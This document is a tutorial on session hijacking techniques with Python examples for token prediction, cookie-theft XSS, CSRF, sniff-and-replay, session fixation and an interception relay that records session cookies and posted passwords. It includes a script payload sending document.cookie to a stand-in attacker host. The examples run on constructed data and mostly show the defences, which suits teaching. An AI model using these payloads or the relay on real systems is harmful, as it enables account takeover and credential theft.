Application Level Session Hijacking

In a session hijacking attack, a session token is stolen, or a valid session token is predicted, in order to gain unauthorized access to the web server.

A session token can be compromised in various ways:

    • Session sniffing
    • Predictable session token
    • Man-in-the-middle attack
    • Man-in-the-browser attack
    • Cross-site script attack
    • Cross-site request forgery attack
    • Session replay attack
    • Session fixation

Compromising Sessions IDs using Sniffing

  • Attacker uses a sniffer to capture a valid session token or session ID.
  • Attacker then uses the valid session token to gain unauthorized access to the web server.

Wireshark, SmartSniffer

Compromising Session IDs by Predicting Session Token

  • Attacker can predict session IDs generated by weak algorithms and impersonate a web site user.
  • Attackers perform analysis of variable section of session IDs to determine the existence of a pattern.
  • The analysis is performed manually or by using various cryptanalytic tools.
  • Attackers collect a large number of session IDs issued at the same time, so that the samples come from one time window; this keeps any time-dependent field constant and isolates the part that actually varies.
  • (Note, ASP) The session cookie handed to the browser is random; the back-end session ID behind it is not crackable.
  • Stealing a session by sniffing works on an intranet, where the attacker shares the network segment with the victim.
  • Capturing the token in transit:
    • from the HTTP header (Cookie)
    • by sniffing
  • Through the user's browser: XSS
  • TCP/IP session hijacking tool: hunt-1.5
    • forges IP address, port, sequence number and acknowledgement number

How to Predict a Session Token
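The analysis described above (fixed section vs. variable section, samples from one time window, look for a pattern) can be mechanised. The following is an added example, not code from the original page: it takes a batch of session IDs, strips the common prefix, and tests whether the remainder is a decimal or hexadecimal counter with a constant step. The sample IDs, the `SESS`/`sid=` formats and the step sizes are constructed for the demonstration; the "random" sample stands in for output of a CSPRNG and shows the check failing, as it should.

```python
"""Pattern analysis over a batch of session IDs collected in one time window."""

# Constructed sample: IDs a hypothetical server handed out within a short window.
# The date part is constant for the window and the tail is a counter stepping by 7.
WEAK_SAMPLE = ["SESS20240101" + format(4100 + 7 * i, "06d") for i in range(8)]
# Constructed hex counter (e.g. an address or row ID), stepping by 0x10.
HEX_SAMPLE = ["sid=" + format(0xABC0 + 0x10 * i, "08x") for i in range(5)]
# Constructed contrast: four values of the kind a CSPRNG produces; no usable structure.
RANDOM_SAMPLE = [
    "9f1c0b7e2a4d58c3e6b1a0f47d2c9e81",
    "3a7e51d09cb24f6e8d1a0c5b7e923f14",
    "c04b9e2d7f1a3c58e6d2b0a19f74c3e5",
    "5e2d8a1f0c7b4936a1d3e0f9b2c47a68",
]


def split_fixed_variable(ids, base):
    """Longest common prefix of the IDs is the fixed section; the rest is the variable section.

    A counter's high-order digits are usually constant across a small sample,
    so trailing digits of the prefix are pulled back into the variable section
    (otherwise a carry, e.g. 99 -> 100, would break the prediction).
    """
    prefix = ids[0]
    for s in ids[1:]:
        n = 0
        while n < min(len(prefix), len(s)) and prefix[n] == s[n]:
            n += 1
        prefix = prefix[:n]
    digits = "0123456789abcdef"[:base]
    while prefix and prefix[-1].lower() in digits:
        prefix = prefix[:-1]
    return prefix, [s[len(prefix):] for s in ids]


def predict_next(ids):
    """Return the next ID if the variable section is a decimal or hex counter with a constant step, else None."""
    for base, fmt in ((10, "d"), (16, "x")):
        prefix, parts = split_fixed_variable(ids, base)
        try:
            values = [int(p, base) for p in parts]
        except ValueError:
            continue  # variable section is not a number in this base
        steps = {b - a for a, b in zip(values, values[1:])}
        if len(steps) != 1:
            continue  # no constant step: no arithmetic pattern in this base
        step = steps.pop()
        if step == 0:
            continue  # all samples identical; nothing to extrapolate
        width = len(parts[-1])
        return prefix + format(values[-1] + step, f"0{width}{fmt}")
    return None


if __name__ == "__main__":
    for sample in (WEAK_SAMPLE, HEX_SAMPLE, RANDOM_SAMPLE):
        print(sample[-1], "->", predict_next(sample))
```

A constant step is the simplest pattern; real analyses also look at IDs that are timestamps, process IDs, or hashes of such values, which is why the page recommends collecting the samples in one narrow time window.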

Compromising Session IDs Using Man-in-the-Middle Attack

  • The man-in-the-middle attack is used to intrude into an existing connection between systems and to intercept messages being exchanged.
  • Attackers use different techniques and split the TCP connection into two connections.
    • Client-to-attacker connection
    • Attacker-to-server connection
  • After successfully intercepting the TCP connection, an attacker can read, modify, and insert fraudulent data into the intercepted communication.
  • In the case of an HTTP transaction, the TCP connection between the client and the server becomes the target.

Compromising Session IDs Using Man-in-the-Browser Attack

  • Man-in-the-browser attack uses a Trojan Horse to intercept the calls between the browser and its security mechanisms or libraries.
  • It works with an already installed Trojan horse and acts between the browser and its security mechanisms.
  • Its main objective is to cause financial deceptions by manipulating transactions of Internet Banking systems.

The man-in-the-browser attack will be successful irrespective of security mechanisms such as SSL, PKI, or two-factor authentication in place, as all the expected controls and security mechanisms would seem to work normally.

Steps to Perform Man-in-the-Browser Attack

  1. The Trojan first infects the computer’s software (OS or application).
  2. The Trojan installs malicious code (extension files) and saves it into the browser configuration.
  3. After the user restarts the browser, the malicious code in the form of extension files is loaded.
  4. The extension files register a handler for every visit to the webpage.
  5. When the page is loaded, the extension uses the URL and matches it with a list of known sites targeted for attack.
  6. The user logs in securely to the website.
  7. When a page load matching one of the patterns on its target list is detected, it registers a button (click) event handler on that page.
  8. When the user clicks the button, the extension uses the DOM interface to extract the data from all form fields and modifies the values.
  9. The browser sends the form and modified values to the server.
  10. The server receives the modified values but cannot distinguish between the original and the modified values.
  11. After the server performs the transaction, a receipt is generated.
  12. Now, the browser receives the receipt for the modified transaction.
  13. The browser displays the receipt with the original details.
  14. The user thinks that the original transaction was received by the server without any interceptions.
After the browser is infected by the Trojan, the Trojan can modify the web page and modify or add any data in HTTP(S) traffic.
Neither the user nor the server knows about this process.

Compromising Session IDs Using Client-side Attacks

  • Cross-Site Scripting (XSS): XSS enables attackers to inject malicious client side scripts into the web pages viewed by other users.
  • Malicious JavaScript Codes: A malicious script can be embedded in a web page that does not generate any warning but captures session tokens in the background and sends them to the attacker.
  • Trojans: A Trojan horse can change the proxy settings in the user's browser to send all sessions through the attacker's machine.

Compromising Session IDs Using Client-side Attacks: Cross-site Script Attack 

  • If an attacker sends the victim a crafted link carrying malicious JavaScript, the JavaScript runs when the victim clicks the link and carries out the attacker's instructions (for example, reading document.cookie and sending the session token to the attacker).
  • Defence: HttpOnly. Setting the HttpOnly flag on the session cookie stops script from reading it through document.cookie, so an XSS payload cannot exfiltrate the token (it can still issue requests inside the victim's session, so HttpOnly limits the damage rather than fixing the XSS).
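To make the HttpOnly defence concrete, here is an added example (not code from the original page) that builds a Set-Cookie header in its weak and hardened forms and audits an arbitrary Set-Cookie value for the three attributes that matter to this page: HttpOnly against script theft, Secure against sniffing, and SameSite against cross-site request forgery. The cookie name, value, attacker host and the sample payload are all constructed for the demonstration.

```python
"""Session-cookie attributes: the weak Set-Cookie next to the hardened one, plus a checker."""

# Constructed XSS payload of the kind the crafted link above would carry: it ships
# document.cookie to a hypothetical attacker host. With HttpOnly set, the session
# cookie is absent from document.cookie and this payload gets nothing worth stealing.
COOKIE_THEFT_PAYLOAD = (
    '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
)


def build_session_cookie(name, value, secure=True, http_only=True, same_site="Lax", max_age=None):
    """Assemble a Set-Cookie header value; the defaults give the hardened form."""
    parts = [f"{name}={value}", "Path=/"]
    if secure:
        parts.append("Secure")       # never sent over plaintext HTTP
    if http_only:
        parts.append("HttpOnly")     # invisible to document.cookie
    if same_site:
        parts.append(f"SameSite={same_site}")  # not attached to cross-site requests
    if max_age is not None:
        parts.append(f"Max-Age={max_age}")
    return "; ".join(parts)


def audit_set_cookie(header):
    """Return the weaknesses found in a Set-Cookie header value (empty list means it passes)."""
    attrs = [p.strip() for p in header.split(";")]
    flags = {}
    for attr in attrs[1:]:  # attrs[0] is name=value
        key, _, val = attr.partition("=")
        flags[key.strip().lower()] = val.strip()
    issues = []
    if "httponly" not in flags:
        issues.append("missing HttpOnly: script can read the token via document.cookie (XSS theft)")
    if "secure" not in flags:
        issues.append("missing Secure: cookie is also sent over plaintext HTTP (sniffing)")
    if flags.get("samesite", "").lower() not in ("lax", "strict"):
        issues.append("SameSite not Lax/Strict: cookie rides along on cross-site requests (CSRF)")
    return issues


# Constructed weak and hardened headers for the same hypothetical session token.
WEAK_HEADER = build_session_cookie("SESSIONID", "7c1a9f3e52d24b8e",
                                   secure=False, http_only=False, same_site=None)
HARDENED_HEADER = build_session_cookie("SESSIONID", "7c1a9f3e52d24b8e")


if __name__ == "__main__":
    for header in (WEAK_HEADER, HARDENED_HEADER):
        print(header)
        for issue in audit_set_cookie(header) or ["ok"]:
            print("  ", issue)
```

The checker is the kind of thing to run over a proxy's captured responses during a test: a session cookie that fails any of the three checks is a finding in itself, independent of whether an XSS bug has been found yet.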

Compromising Session IDs Using Client-side Attacks: Cross-site Request Forgery Attack 

  • Cross-Site Request Forgery (CSRF) attack exploits the victim's active session with a trusted site in order to perform malicious activities.

a.k.a. one-click attack or session riding
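The following added example (not code from the original page) shows why an active session is all the attacker needs. A hypothetical money-transfer endpoint is implemented twice: the vulnerable version authorizes on the session cookie alone, so a form auto-submitted from the attacker's page is honoured because the victim's browser attaches the cookie automatically; the protected version also requires an anti-CSRF token that the attacker's page cannot read. The session store, the forged request and the HMAC-based token scheme are constructed for the demonstration.

```python
"""CSRF: a transfer endpoint that trusts the session cookie alone, beside one that also demands an anti-CSRF token."""
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)  # hypothetical server-side key, generated per process
SESSIONS = {"sess-alice": {"user": "alice", "balance": 100}}  # constructed: one logged-in user


def csrf_token_for(session_id):
    """Anti-CSRF token bound to the session with an HMAC, so the server needs no extra storage.

    A page on attacker.example cannot obtain this value: it is rendered only into
    the site's own forms, and the browser's same-origin policy keeps it there.
    """
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def _session_for(request):
    return SESSIONS.get(request["cookies"].get("SESSIONID"))


def transfer_vulnerable(request):
    """Authorizes on the cookie alone, so a form auto-submitted from a third-party site goes through."""
    session = _session_for(request)
    if session is None:
        return 401
    session["balance"] -= int(request["form"]["amount"])
    return 200


def transfer_protected(request):
    """Same endpoint, but the form must also carry the token bound to this session."""
    session = _session_for(request)
    if session is None:
        return 401
    sid = request["cookies"]["SESSIONID"]
    sent = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(sent, csrf_token_for(sid)):
        return 403  # request did not come from a page that could read the token
    session["balance"] -= int(request["form"]["amount"])
    return 200


# Constructed forged request: the victim's browser attached the session cookie
# automatically, but the attacker's page had no way to include a valid csrf_token.
FORGED_REQUEST = {
    "cookies": {"SESSIONID": "sess-alice"},
    "form": {"to": "mallory", "amount": "40"},
}


def legitimate_request(session_id, to, amount):
    """What the site's own form submits: the cookie plus the token it was rendered with."""
    return {
        "cookies": {"SESSIONID": session_id},
        "form": {"to": to, "amount": str(amount), "csrf_token": csrf_token_for(session_id)},
    }


if __name__ == "__main__":
    print("vulnerable, forged:", transfer_vulnerable(FORGED_REQUEST), SESSIONS)
    print("protected, forged:", transfer_protected(FORGED_REQUEST))
    print("protected, legitimate:", transfer_protected(legitimate_request("sess-alice", "bob", 10)))
```

The token check is the primary control; SameSite=Lax/Strict on the session cookie and a check of the Origin header are defence in depth and cost nothing to add.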

Compromising Session IDs Using Client-side Attacks: Session Replay Attack

  • In a session replay attack, the attacker listens to the conversation between the user and the server and captures the authentication token of the user.
  • Once the authentication token is captured, the attacker replays the request to the server with the captured authentication token and gains unauthorized access to the server. 
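Sniffing (the "Compromising Session IDs using Sniffing" section above) and session replay are the two halves of one procedure: read the token out of captured traffic, then send a new request carrying it. The following added example, not code from the original page, walks through both against constructed plaintext HTTP traffic: a captured request as a sniffer on the same segment would see it, a parser that pulls out cookies with session-like names, a replayed request built from the captured Cookie header, and a hypothetical server that accepts it because it checks nothing beyond the token. The host name, token and cookie names are constructed.

```python
"""Sniff-and-replay walk-through on constructed plaintext HTTP traffic."""

# Constructed capture: one plaintext HTTP request from the victim, as a sniffer
# on the same network segment would record it. Token and host are made up.
CAPTURED_REQUEST = (
    b"GET /account HTTP/1.1\r\n"
    b"Host: intranet.example\r\n"
    b"Cookie: theme=dark; SESSIONID=7c1a9f3e52d24b8e\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"\r\n"
)

# Cookie names commonly used for session identifiers (extend for the target framework).
SESSION_COOKIE_NAMES = {"SESSIONID", "JSESSIONID", "PHPSESSID", "ASP.NET_SessionId"}


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers dict with lower-case names)."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def extract_session_tokens(raw):
    """Return {cookie_name: value} for cookies in the request that look like session identifiers."""
    _, _, headers = parse_request(raw)
    found = {}
    for part in headers.get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name in SESSION_COOKIE_NAMES:
            found[name] = value
    return found


def build_replay(raw, path, method="GET"):
    """Forge a new request to `path` that carries the victim's captured Cookie header."""
    _, _, headers = parse_request(raw)
    return (
        f"{method} {path} HTTP/1.1\r\n"
        f"Host: {headers['host']}\r\n"
        f"Cookie: {headers['cookie']}\r\n\r\n"
    ).encode()


# Hypothetical server: a session table with one logged-in user. It accepts any
# request bearing a live session ID, which is exactly what lets the replay succeed.
SESSIONS = {"7c1a9f3e52d24b8e": {"user": "alice"}}


def server_handle(raw):
    """Return the user the server believes sent this request, or None."""
    tokens = extract_session_tokens(raw)
    session = SESSIONS.get(tokens.get("SESSIONID"))
    return session["user"] if session else None


if __name__ == "__main__":
    print("captured:", extract_session_tokens(CAPTURED_REQUEST))
    replay = build_replay(CAPTURED_REQUEST, "/account/export")
    print("server sees replay as:", server_handle(replay))
```

Two caveats a practitioner should keep in mind: over TLS the sniffer sees only ciphertext, so this works against plaintext HTTP (or after TLS has been stripped); and on the server side the replay succeeds because the token is the sole proof of identity, which is why short session lifetimes, re-authentication for sensitive actions and token rotation matter.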

Compromising Session IDs Using Session Fixation

  • Session Fixation is an attack that allows an attacker to hijack a valid user session.
  • The attack tries to lure a user to authenticate himself with a known session ID and then hijacks the user-validated session by the knowledge of the used session ID.
  • The attacker has to provide a legitimate web application session ID and try to lure victim browser to use it.
  • Several techniques to execute Session Fixation attack are:
    • Session token in the URL argument
    • Session token in a hidden form field
    • Session ID in a cookie

Session Fixation Attack

  • Attacker exploits the vulnerability of a server which allows a user to use a fixed SID.
  • Attacker provides a valid SID to a victim and lures him to authenticate himself using that SID.
  • There are three phases to carry out a Session Fixation attack:
    • Session set-up phase: make a normal request to the website to obtain a session ID. Because the website may enforce an idle-session timeout, keep repeating the request so that this session ID stays alive.
    • Fixation phase: make the victim use this session ID.
    • Entrance phase: wait for the victim to log in using this session ID; the attacker can then use the same session ID directly.
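The three phases above, played out against a minimal in-memory session store, as an added example that is not code from the original page. The store has an idle timeout (which is why the attacker keeps sending keep-alive requests) and a switch for the fix that matters here: regenerating the session ID at login. With the switch off, the ID the attacker obtained in the set-up phase becomes the victim's authenticated session; with it on, the same ID is worthless after login. The timeout value, the clock and the user name are constructed.

```python
"""Session fixation against an in-memory session store, with and without ID regeneration at login."""
import secrets

IDLE_TIMEOUT = 300  # seconds; hypothetical idle-session timeout of the target site


class SessionStore:
    """Minimal server-side session store; `regenerate_on_login` is the fix under test."""

    def __init__(self, regenerate_on_login):
        self.regenerate_on_login = regenerate_on_login
        self.sessions = {}  # sid -> {"user": str | None, "last_seen": int}

    def _alive(self, sid, now):
        """Return the session if it exists and has not idled out, refreshing its timer."""
        session = self.sessions.get(sid)
        if session is None:
            return None
        if now - session["last_seen"] > IDLE_TIMEOUT:
            del self.sessions[sid]
            return None
        session["last_seen"] = now
        return session

    def new_session(self, now):
        """Any visitor gets an unauthenticated session ID (the attacker's set-up phase)."""
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": None, "last_seen": now}
        return sid

    def request(self, sid, now):
        """A plain request carrying the cookie; returns whether the session is still alive."""
        return self._alive(sid, now) is not None

    def login(self, sid, user, now):
        """Authenticate the user behind `sid`; returns the session ID the client should use afterwards."""
        session = self._alive(sid, now)
        if session is None:
            return None
        if self.regenerate_on_login:
            # Hardened: discard the pre-authentication ID so a planted one becomes worthless.
            del self.sessions[sid]
            sid = secrets.token_hex(16)
            self.sessions[sid] = {"user": user, "last_seen": now}
            return sid
        session["user"] = user  # vulnerable: the planted ID is now an authenticated session
        return sid

    def whoami(self, sid, now):
        session = self._alive(sid, now)
        return session["user"] if session else None


def run_fixation(store):
    """Play the three phases; return (what the attacker sees with the planted ID, what the victim sees)."""
    fixed_sid = store.new_session(0)                       # set-up phase
    for now in range(200, 1400, 200):                      # keep-alives, each under the idle timeout
        if not store.request(fixed_sid, now):
            raise RuntimeError("fixed session expired before the victim used it")
    # Fixation phase: the victim's browser is steered to fixed_sid (URL parameter,
    # hidden form field or injected cookie); modelled here by passing it to login().
    victim_sid = store.login(fixed_sid, "alice", 1400)     # entrance phase
    return store.whoami(fixed_sid, 1401), store.whoami(victim_sid, 1401)


if __name__ == "__main__":
    print("no regeneration:", run_fixation(SessionStore(regenerate_on_login=False)))
    print("regenerate at login:", run_fixation(SessionStore(regenerate_on_login=True)))
```

Regenerating the ID on every privilege change (login, and ideally re-authentication or role switch) is the standard fix; refusing session IDs the server never issued closes the variant where the attacker invents an ID instead of obtaining one.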

Session Hijacking Using Proxy Servers

  • Attacker lures the victim into clicking a bogus link which looks legitimate but redirects the user to the attacker's server.
  • Attacker forwards the request to the legitimate server on behalf of the victim and serves as a proxy for the entire transaction.
  • Attacker then captures the session information exchanged between the legitimate server and the user.
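This proxy attack and the man-in-the-middle attack described earlier ("Compromising Session IDs Using Man-in-the-Middle Attack") share one mechanism: the connection is split into a client-to-attacker leg and an attacker-to-server leg, and the attacker reads both. The following added example, not code from the original page, is a relay that does exactly that for HTTP: it re-addresses each request from the look-alike host to the real one, records Cookie headers and posted bodies on the way in and Set-Cookie headers on the way out, and returns the response unchanged so the site appears to work normally. The two host names, the constructed stand-in for the legitimate server and the session token are all made up for the demonstration.

```python
"""Attacker-in-the-middle relay: the bogus link lands on the attacker's host, which forwards every request to the real server and records session material on both legs."""

REAL_HOST = "bank.example"                # hypothetical legitimate server
PROXY_HOST = "bank-secure-login.example"  # hypothetical look-alike host the bogus link points at


def fake_upstream(raw_request):
    """Constructed stand-in for the legitimate server: issues a session cookie on login, serves a page otherwise."""
    request_line = raw_request.split(b"\r\n", 1)[0]
    if request_line.startswith(b"POST /login"):
        return (b"HTTP/1.1 302 Found\r\nLocation: /account\r\n"
                b"Set-Cookie: SESSIONID=d41d8cd98f00b204; Path=/; HttpOnly\r\n\r\n")
    return b"HTTP/1.1 200 OK\r\nContent-Length: 7\r\n\r\nbalance"


class Relay:
    """Terminates the client-to-attacker leg and opens the attacker-to-server leg (`upstream`)."""

    def __init__(self, upstream, real_host):
        self.upstream = upstream
        self.real_host = real_host
        self.captured = {"cookies": [], "set_cookies": [], "bodies": []}

    def handle(self, client_request):
        head, sep, body = client_request.partition(b"\r\n\r\n")
        forwarded = []
        for line in head.split(b"\r\n"):
            name, _, value = line.partition(b":")
            key = name.strip().lower()
            if key == b"host":
                line = b"Host: " + self.real_host.encode()  # re-address to the real server
            elif key == b"cookie":
                self.captured["cookies"].append(value.strip().decode())  # token in transit
            forwarded.append(line)
        if body:
            self.captured["bodies"].append(body.decode(errors="replace"))  # e.g. posted credentials
        response = self.upstream(b"\r\n".join(forwarded) + sep + body)
        response_head = response.partition(b"\r\n\r\n")[0]
        for line in response_head.split(b"\r\n"):
            if line.lower().startswith(b"set-cookie:"):
                # HttpOnly does not help here: the relay is on the wire, not in the browser.
                self.captured["set_cookies"].append(line.partition(b":")[2].strip().decode())
        return response  # passed back unchanged, so the site appears to work normally


def run_scenario():
    """Victim logs in through the look-alike host, then fetches a page; return what the relay captured."""
    relay = Relay(fake_upstream, REAL_HOST)
    relay.handle(
        f"POST /login HTTP/1.1\r\nHost: {PROXY_HOST}\r\nContent-Length: 27\r\n\r\n"
        f"user=alice&password=hunter2".encode()
    )
    relay.handle(
        f"GET /account HTTP/1.1\r\nHost: {PROXY_HOST}\r\n"
        f"Cookie: SESSIONID=d41d8cd98f00b204\r\n\r\n".encode()
    )
    return relay.captured


if __name__ == "__main__":
    for kind, items in run_scenario().items():
        print(kind, items)
```

Because the victim is talking to the attacker's host, TLS on the legitimate site does not interfere: the attacker can hold a perfectly valid certificate for the look-alike name, and the only visible sign is the host name in the address bar. Note that the relay captures the session cookie regardless of its HttpOnly and Secure flags; those attributes defend the browser, not the path to a server the user was tricked into visiting.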
